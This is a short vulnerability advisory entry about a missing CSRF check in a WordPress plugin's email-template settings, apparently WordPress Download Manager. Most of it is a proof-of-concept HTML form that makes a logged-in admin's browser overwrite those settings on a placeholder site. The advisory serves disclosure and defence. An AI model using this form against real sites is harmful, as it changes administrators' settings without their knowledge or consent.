The plugin did not have CSRF check in place before saving its Email Template setting, allowing attackers to make a logged in admin change them via a CSRF attack
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" method="POST"> <input type="hidden" name="__wpdm_email_template" value="default.html" /> <input type="hidden" name="__wpdm_email_setting[logo]" value="" /> <input type="hidden" name="__wpdm_email_setting[banner]" value="" /> <input type="hidden" name="__wpdm_email_setting[footer_text]" value="Changed Via CSRF" /> <input type="hidden" name="__wpdm_email_setting[facebook]" value="" /> <input type="hidden" name="__wpdm_email_setting[twitter]" value="" /> <input type="hidden" name="__wpdm_email_setting[youtube]" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Yes
2021-08-09 (about 1 years ago)
2021-08-09 (about 1 years ago)
2021-08-09 (about 1 years ago)